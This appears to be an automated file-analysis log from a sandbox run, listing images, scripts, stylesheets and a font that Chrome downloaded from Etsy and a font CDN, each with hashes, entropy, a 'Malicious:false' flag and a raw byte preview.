                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):59910
                                                                                                                                                                              Entropy (8bit):7.993185550600172
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:41E4672511FCAE27FA2D56CA83650C6D
                                                                                                                                                                              SHA1:C16B9B2038DE418661B18755A83435960BA6FD9B
                                                                                                                                                                              SHA-256:83E66CBB51FE4B98EB349A53BD6B6B8E63EB81E0CD2EC159D9186209D71012B8
                                                                                                                                                                              SHA-512:A2B120DA9ACC3290D5BF7492B2C9158675612C67C7DF194728CADE36625D74BE6698678BBA3E0D71DA7657FDD4B3315E41B39440C463302E38CA0BEDAB38ECF3
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/6227952/r/il/7f8d5e/4180984592/il_600x600.4180984592_stpv.jpg
                                                                                                                                                                              Preview:RIFF....WEBPVP8X.... ...W..W..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 .........*X.X.>a*.F$"..... ...M...Pxk..T~I~...[r:..i..G....q.>...._......p..{...S.........;.......?.?.......p=......g.+.[.W.g.7................D......%.....O....1.f......1_....7...."...?............../.?..........w.....}...~.q.......G.O....?.a....Y.X.G..............k....`........f.O...oH.`~.|..D.'....W...D.&W..4b.e+..>..<..K^.].u.A{....;w_.........[Vo4reF.A.E..2K|..;r.e+[1..,..@.c.....7.eaN.a...\.fk?".G.@..e..zg....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (65390)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):781472
                                                                                                                                                                              Entropy (8bit):5.586248254739451
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9EDB70343B03872D0B2C5959BD5E618C
                                                                                                                                                                              SHA1:3E80F70BC7930CAE2FD0384CC06E6465EAFF169D
                                                                                                                                                                              SHA-256:F8582D5EA51D74F4D84BBF1247AFF7084B27A91E7B1E2B5657F169A5DCB3B54F
                                                                                                                                                                              SHA-512:916A9BD8D96BD2E64D203530A8DF02B8EC35626E97646B7FD980B0239966D81EF4A31F36034E93E6961E2D1C9BE4DEA0CDE597F0CA7A3DD4B6BAD150902AFF12
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.etsy.com/ac/evergreenVendor/js/en-US/vesta_homepage/bootstrap.5d0f0b94a6c3a71715b6.js
                                                                                                                                                                              Preview:// For license information, please see: https://www.etsy.com/ac/evergreenVendor/js/en-US/vesta_homepage/bootstrap.5d0f0b94a6c3a71715b6.js.LICENSE.(()=>{var e={92662:(e,t,i)=>{"use strict";i.d(t,{default:()=>o});var n=i(75448);const s={"rate-n-stars":[["{{value}} stars","{{value}} star","{{value}} stars"],[["is",[0]],["is",[1]],["else"]]],"rating-tooltip-1":"Disappointed","rating-tooltip-2":"Not a fan","rating-tooltip-3":"It's okay","rating-tooltip-4":"Like it","rating-tooltip-5":"Love it",loading:"Loading",error:"Error","new-tab":"Opens a new tab","remove-action":"Remove","dismiss-action":"Dismiss","undo-action":"Undo","select-all":"Select all","add-file-label":"Add file","drop-file-or-label":"Drag and drop or","file-size-bytes":"{{size}} b","file-size-kilobytes":"{{size}} kb","file-size-megabytes":"{{size}} mb","file-size-gigabytes":"{{size}} gb","retry-upload":[["Retry uploads","Retry upload","Retry uploads"],[["is",[0]],["is",[1]],["else"]]],"play-full-video":"Play Full Video","resu
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 340x270, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):31899
                                                                                                                                                                              Entropy (8bit):7.9613481309095935
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2974E7061D002161BAA0FC19417294DF
                                                                                                                                                                              SHA1:D9F16685E378064C38483E7512DF744B969E9B4E
                                                                                                                                                                              SHA-256:B14646351D9608989A4CA682CF415AD2DCAD336624DDD4E300B9C147A189E1A0
                                                                                                                                                                              SHA-512:CB32BF696F35B9B7E138E3352A76FAE0DEAA90D01288220A3786A7D28D25E03CB01D2963DC01CAE9823E3A911C9ACE2316F7AF6C998BE6DA5F0D43033CC688A1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.........T.."........................................Q.........................!..1A"Q..2aq..#B....R.$3.....Cbcdrs...%45DSTV........................................7......................!1..AQq."a2.#.....BRb.3.STr................?.U.R....?.-..#...H#I.....*.xP..........DMV......G....~Vp....yc.#$...*.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):91371
                                                                                                                                                                              Entropy (8bit):7.965720641481452
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5B84156C2EC340274A5439C77B79327E
                                                                                                                                                                              SHA1:87CF859FF63345CF681AD5AFAA4BB6298832B149
                                                                                                                                                                              SHA-256:09881350BEDB142EE146ED3B949D3AC80E6C9DA6394D652ED7B12042F9FA070A
                                                                                                                                                                              SHA-512:C5D0DD226B64DA89B07D50485E874B97076C4C60666A8757AAC8A7642B35A30B56D39DB7223CC175B183CA5FEE1C3E6C64A083C019F7A4B196E5819355CD3E23
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................A......................!..1AQ.."a.2q.B...#Rb......3r...$C..S.%..................................;.......................!..1AQ."aq.2...B..#R.....3b.$4Cr..............?....)v.d....{WB..'#...?.t1b...<...X.........)+...../...2........#..f..#..wg'.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):4831
                                                                                                                                                                              Entropy (8bit):7.901780094530964
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:891BECD24FCBAAD51E8A603F523B5569
                                                                                                                                                                              SHA1:F255AC13CFD8A8D68A4DC6B4A128A783BD92AD1E
                                                                                                                                                                              SHA-256:22708F549D318E49A02DB6B0C1C108F75A6F20A17F7A5D75C685410960349B03
                                                                                                                                                                              SHA-512:79091839D53CE8527071677B4DE3282E938AA3D6263B57C23050B191830CF962E99250C66DF43271209ECEFF8F9CCBCBD51EBDAD060F0880618A9853181CC581
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/24575237/r/il/c972a9/5933335775/il_340x270.5933335775_6f1b.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......T........pixi............ipma...................mdat....."*p...h4 2.#D\.QE.P.^..y.bV..A6..~x.0.r.../...zAki.....;X.x...(}..)..N.....r.N.}..AM.p.~S....nW.o.......&;&...J...^.x..j.....W..@..*.72c{B...0..<....[H..h....j.iDyX.....).E+..,../*.w........:./..^...,I.....m...mw..}Uz.K.].....p>.}._.'{.K..+.....dK.O..TzW`...M. .O~....t....X...(....!....}4........".e(.............x..).q....h.U.&.F.Vj...ED..f.v.n.....P..tL.q..+s7..]..."y%...M.o..vCO.s.e.K.Q...X..w..X64.....B,..R...E..x5B..z#..g..jQ..hr..........?..+...~.i..f.....[...@n.W.U...J]n....a.`..5.K.<....- ......*@.<.m"xB<q..q..f.0.A..].k.....4......;<...&her.....L....G..%hi../1....q.gS..E.t.z.ya......2....;\i..?......N"...]G.s...6..........r$d.|=.#D..o.iI.B..........T..."Yw..Y..)n.P..l./.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):23337
                                                                                                                                                                              Entropy (8bit):7.989041047326875
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6FA02F1C499D1C21A920525B17F6FC4C
                                                                                                                                                                              SHA1:A10265A53604F6846570A654E48439368D8613EA
                                                                                                                                                                              SHA-256:D945AAC3003021077E14BE4EA8FCFC77C704A0624F9568F6B72FC25CA4BF7EDB
                                                                                                                                                                              SHA-512:537CEF7F8617D8CFF18586625274186E85EA7DB13B18FF5CFB7F370F62F60F233D19A1D2309A686BB9EDE2A30EFBED5FC282C7E853E37B9E9366A761059FCEB8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18152467/r/il/6920fd/5808374756/il_340x270.5808374756_iizu.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................Z....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......T........pixi............ipma.................Z#mdat....."*p...h4 2........a@.k9.wH..i...l(x..s.w9...k....:K5\.k!?..0.?8...N."^....zy.+}].t.q1.......6.. .0'...\5..#...2..L.N.....^Z.{.~..F..EI~.o.*..I....R...$.Z.......R.S.....I.=.V..q2.. -...........{....Sk.V}..Tl#....B...........ob.....L..c.D......Ep...5....L'..B..8...@........~...o...}..9KA.....zV...I6.&.....dq....l.qx.....^.........\O..|..]J.....r......$k/?g.X<&#]....=S.K.E.h.w..v..t.4@d.O.R.5??t..i.6.{.......OD\.8e.L.-@D...B..>a.....(..$s.Y|z=.4..``....'f...Q.|>..>#.E.].Y>.v.KB..7Pt.z....X..X... I....A6.X....9<J...Pl..._V.......W..n9.....Z....'.S....o....J.A...L}.V.U..p~.G.,S.....J....t...J_-.-..c..^..f2..."T..!i...*..w2.' K..f.?..;. |cy}.4Kz......@.tt...Z.Gx..0C.&.R.Z..[.NF.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):12004
                                                                                                                                                                              Entropy (8bit):7.967902735415451
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:CDB55F5BAEAA78A246BBDDB888E0C198
                                                                                                                                                                              SHA1:D878A70B4082182E3C878713FF1D726DF2A15BCE
                                                                                                                                                                              SHA-256:30D866EA83FFAB8A0DF5505FEDF7AF18DF10DE6B403A72AFFAF82D989E4AD4A0
                                                                                                                                                                              SHA-512:7122872B8AE15FE03B461EF33567E2F4A344CD0F8F21F3BFA1C22D58A583EB77CEDF11FB1373C7ABF56EE719DE14666834B292F436F8417BF50284F31ACD3945
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/16759523/c/2000/2000/500/0/il/8ecc7b/4433676832/il_600x600.4433676832_eymh.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................-....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................-.mdat.....&ey_.....2.[D4. ..P..^.N.*......$).5...njX.(~...X.ea....]x.O..4lK...2B.T/^..W.B...Id`D..H...@rQ...$|.e%...*dv..}....w..QsS..Ow&8.j.L...bS.M{..$.?.P..R.........y.q.`......w...4~.2Dn...B..L.b'..SN...A..N..@...nMl .X~.....Oo.(&.un.0~Z....%^....;Yn......h].../ .2.[.....o...T.....F.k....4..%..lT]..s.h.....I;O.%.e.......n..Oo....nR.c....E.H....{.J.!.c..d.J"~..f..D...`%....F?..].....)<..2.W..#)9..3..vT...4.}.0./._.P.fh..D"k...0......uh..'./`......(.bK....v.......]H....U..9.....j?..P.Tp.C..ZU..iC.....h.....B..J.\E..HY~..Fcl.7......_.=k-....J...).....:X....v.E...F.,...V..........9a[./.3..RHq.q9V........9..7...e.\...(V..<..F.|............!.l.".KQ.,Z.?>.4.Fom....%...=.'..m....D>....T_..2
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):10605
                                                                                                                                                                              Entropy (8bit):7.968318185304906
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:553C7B8052FB0406CB0DD95FC8CE9528
                                                                                                                                                                              SHA1:9FE80B0DA04CF28975C81DB9D0A05A7ED40CEA17
                                                                                                                                                                              SHA-256:69345A317216507F0BD8F3AA30B631069AE12D6FAC8DE67762208717BFA0A047
                                                                                                                                                                              SHA-512:112CD16681AC259456C85554E4B3716EA99D626984E2EE51AD0714F5B84C5F83094227A442504C4D5B414C1888C2026800624E12E65F6AAA6562096E3AD4E017
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/10204022/c/2222/2222/541/465/il/fc9f3e/3747068664/il_600x600.3747068664_6izu.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................(_...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................(gmdat.....&ey_.....2.P.....1@.i>.xO.t?.L.i...(....D.b)8.$4I:Z5.H..|...B.9....qT!:}..3....m.>..[k.....+..2.t.. 7..]....2_..I)....%..=/.*:....8........C..4.g._...O#W-c...uf../H.h~.K{ht.$p.Vr..Z..{.Y].|o-.m._Ml...2.m...K..D..e'..d....%.S.8.F.k.f.F.G...U.....{W'..1..Q.e.Or..\..6.X..~..g.....Ys.u.6.A.J....Z..0t....%.t.Z...tA..`...b^WYLuc@.....u...../%...$Y.c......2N.ZRE...Z..~.u..Acx....Tv'].C..-.....I...gdrB.K.d.......d.......A.bB..lSC.....m.U!^J..h.K.,h.{0...z7.5L...v~I.H*.[...Y..)&/..d..{suf.r.i.\.x.5......<$..........>.)j.#un......2.................7.Lr.d..>..(.%...@t/x.2.\.....=..f#//.G....G-_...:P......v.`.|.7...{...,.Q..k....E.R,...)3..G.6.Z...G.a...`.....Z.D*.....3..]]..`.u...#..5
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):118298
                                                                                                                                                                              Entropy (8bit):7.966378980519519
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:71CE71B81B98A32742E1CDB02609DD05
                                                                                                                                                                              SHA1:713FFDFF8F625A5A6A6ACE68E395B6E4D4B9C3A1
                                                                                                                                                                              SHA-256:06BFEE3C94C8C29528553D5738F8CB114AE5DBD9E4A1AADF431CC7F10BB177FC
                                                                                                                                                                              SHA-512:030F64D05FFD22E78EC5A69BC36BB86A5B54B6C817EB938CCCD9E56D9CD82EB322A0D589AFA9E2A6A36216B5B0E7D74C6E2F3E1BBBBAFCDB6233BC7A48168FF6
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......X.X.."........................................G.........................!.1AQ."aq.2...#B.Rb..$3r....%CS...4c..s.&5..................................3.......................!1.AQ..a"2q...#3R.B...b...............?.d..+.p.....51X<...vS....".;...c..@.7e.......fL. .S.~.(T..q.l4J.U..".\u..E...F....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):401360
                                                                                                                                                                              Entropy (8bit):5.08734706448808
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:E35161B4CA570DFCEDF5F9982FFC42A4
                                                                                                                                                                              SHA1:F542E1AC29CED2F116C8E1410D42567E7F2817E0
                                                                                                                                                                              SHA-256:E01693750CFA2FA9DE40E6BF79BFBE23F4623B95685E06FBC01AABE0AB6C0BCD
                                                                                                                                                                              SHA-512:7FE52BA8B30164A552DCEB96BBE3E5553ABF05D229886FF0B8B665A44F8183337A41878F3609720900F41779B2D24EBAB5A60432F401B0F4BCB08BD43F7C7618
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:"https://www.etsy.com/dac/site-chrome/components/components.fc26458b142737,site-chrome/header/header.74cb1c37c4995e,__modules__CategoryNav__src__/Views/ButtonMenu/Menu.8d961c48ba074a,__modules__CategoryNav__src__/Views/DropdownMenu/Menu.74cb1c37c4995e,site-chrome/footer/footer.74cb1c37c4995e,gdpr/settings-overlay.74cb1c37c4995e.css?variant=sasquatch"
                                                                                                                                                                              Preview::root{--clg-typography-pal-weight-600:600;--clg-typography-pal-weight-500:500;--clg-typography-pal-weight-400:400;--clg-typography-pal-weight-300:300;--clg-typography-pal-weight-200:200;--clg-typography-pal-family-sans-serif-semibold:"Graphik Webfont","-apple-system","Helvetica Neue","Droid Sans","Arial","sans-serif";--clg-typography-pal-family-sans-serif-medium:"Graphik Webfont","-apple-system","Helvetica Neue","Droid Sans","Arial","sans-serif";--clg-typography-pal-family-sans-serif-regular:"Graphik Webfont","-apple-system","Helvetica Neue","Droid Sans","Arial","sans-serif";--clg-typography-pal-family-serif-regular:"Guardian-EgypTT","Charter","Charter Bitstream","Cambria","Noto Serif Light","Droid Serif","Georgia","serif";--clg-typography-pal-family-serif-light:"Guardian-EgypTT","Charter","Charter Bitstream","Cambria","Noto Serif Light","Droid Serif","Georgia","serif";--clg-typography-pal-family-serif-thin-italic:"Guardian-EgypTT","Charter","Charter Bitstream","Cambria","Noto Serif Th
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):78558
                                                                                                                                                                              Entropy (8bit):7.97612543398786
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2222B9B84A7EB7AF1868CEAC23D484ED
                                                                                                                                                                              SHA1:BD7BEF92605FD198E771D18086246B35CD88D007
                                                                                                                                                                              SHA-256:384CEC9290950132633FED40536EB965BC11EA7C5044ABA6DEB8D149E5F4B27C
                                                                                                                                                                              SHA-512:79FA642032A1CF8FC817B83D44904BB1AD3073FA8C38B2799EFE8A6106BE69B94EE35D43ED01D4DD32F3B234ACF2F86BD0346E189FC5E84561B868752A47EE4D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................R.........................!1A.."Qaq...2...#B...Rb..$3r..CS...%cs...4D....&..5ETUd.................................=......................!..1A."2Qaq....#Br...3R...b..C$S...4.............?.....E@.P.<z1F08.....{..~H-..........q..?yM...9+f.._.Y.....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):17778
                                                                                                                                                                              Entropy (8bit):7.802816294107077
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:713A49955C8EFA76C2C2750BA8389219
                                                                                                                                                                              SHA1:208A30432B476B12DC409051A5E05F0CEF91AD7D
                                                                                                                                                                              SHA-256:66E4DD1170A2E25573F7D7FFD24A354896A3158D0621853710C202E57C8BE52C
                                                                                                                                                                              SHA-512:4FE65E9AAEBFF37DA4DD674F7AD93D6FC4A8C7E53E388984C0A7E50BC6C8D78F7B42756460B68823F6912701F18EDBA1CDE9BF2593FA112AA07EE5E225CBF8C5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................;......................!..1.AQ.a..."q2B..#...3R..$b..%...C.................................4........................!1.AQ.a."q..2...BRb.3..C..............?....Y......... .B..&..'.A.).P.J>.."..b$d@%.P.....)...P&..@......-.............-..........a..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):12880
                                                                                                                                                                              Entropy (8bit):7.940642547001936
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:334A62BE9EABA8AA0F9A5ED30DDD3EB5
                                                                                                                                                                              SHA1:D9D413624565F4CF39B60E7610AFEEA37F083A8E
                                                                                                                                                                              SHA-256:EFB3614D85E8DF5BBB0222C38CBEF65D7EA3FE48D67A575B6866CBFC9E127B30
                                                                                                                                                                              SHA-512:539248EE83DF8B08CA478B7AD6A4E3A32F22BB9C4FF6B55CDF4656226A61226DF61C187BDF7985BA69EC1A75DB8A2E01146583DE8322381C158CACD17D2B101F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18152467/c/2429/1718/0/0/il/c61ea5/2481133323/il_340x270.2481133323_7ltf.jpg
                                                                                                                                                                              Preview:RIFFH2..WEBPVP8X.... ...S.....ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 .0.......*T...>9..D"!...X ....Z.....Ze..._..C..;._..G....1...... .o..|.....|g.7..S.3..?....................'~............I...............=w.q...................wY.J<?...Ot.>.....y.._.......)._.....x.d..h...7..}..].......^=.]...{...W.o._....!}O...?.?._._.=z=.....~........-4JO.W.\.D....).....Q.P...Kc.kI..~...J..[...D./..|M./.i......9....U0.*.z..9.e....u.i.f........^.G......e.(.G!r..O?.b.x..q.{X..[$...^.Q...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 111192, version 3.1245
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):111192
                                                                                                                                                                              Entropy (8bit):7.997459528920886
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:823F35A845A9DFBF9800C8A37B635269
                                                                                                                                                                              SHA1:C3064C7E34213E30493C6A972F3D66F4D145885B
                                                                                                                                                                              SHA-256:AAA02AA09B0BC5BC5C57095AAA6E15BEA07480136E9AAB705F69886DAA213325
                                                                                                                                                                              SHA-512:9177511E5F379346EE2B0501106D385FE8830FAC2D8C5EA89023B3422E4302AC9EEBB9FD0423154B34214D9483E0B45F5E369C0B509EDF3960D6437090C694C2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://cdn.jotfor.ms/fonts/inter/fonts/Inter-Medium.woff2
                                                                                                                                                                              Preview:wOF2.......X..........................................P...x.`?STATD............a.6.$..J..P.. .........[.Q....l..S...]C'92.Z...~.o.QG'.v2|.........v.t.a....,..g@.?T.b.9.[..[.@.'.................9.........q.5..Q...A.K0..R..}.i..:.e..m.A....I.a.W....A.x......[2.&......0..xg..b.t.....t'L%.^R2..z...&..Ic.U.1....A,.@.B`..H.2.2yB1..fT.@Ho........z...%-.....*9.C...J..T.i.Q.....L.....tu&..!..Il.....t..xd.l.. 3.U.......{...,.5.{.j..+J. ...z,......`..jXQu.G..a.V..av....$'..|.v|..)..oQoc(?0..b....X......&.EkI.p./.V...A.....R...!/^...J..G....(!aM\...1\.a..Z.I<.W.M...(.(mXBC..$SmO..jX...%J*K..T...(m./..Mhb...>_9...W....`..p"m.i.U.8;.......)lm..m....l=..9.....!M...gh..9MD...a.wo..Xex:@.4..v?q<O...).lL.|..'.C.^.B..pvWx0.xEiB.9.......n.k5M...-.&...}M.25..K8..).t.:.$d..~.V..8.."[......4/..........q.?......l.\J...J.S..x.R...04.~Hr...;..\.y.B.}.q....7.`g....7e..3.t_...n....tf[z...,9M.5.Z}o}..G.:6..Y.yTM....TA...d...1)..2.....Z5.Yb~...)UT.......( .T..4..s.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):28645
                                                                                                                                                                              Entropy (8bit):7.991204804813118
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D5CEC778877B8F9BAA6255F60D302667
                                                                                                                                                                              SHA1:33C07E4D923DA772F8BB09DA8490A75878D7AA9E
                                                                                                                                                                              SHA-256:A8BC1EE182DE82CB2C78798CA32C0587F3B97CE52A8C73983E3A039D59EB3A6D
                                                                                                                                                                              SHA-512:CBCF09537F0D34A07E473D6D33E299B0C945B4C5A4990C91F469454325164A117FA0AFF3D8660C846F4DE4F7B16B2B5A4B25AE92760A6FD552231145E4863836
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/6227952/r/il/6aedb8/4261468194/il_600x600.4261468194_mw3c.jpg
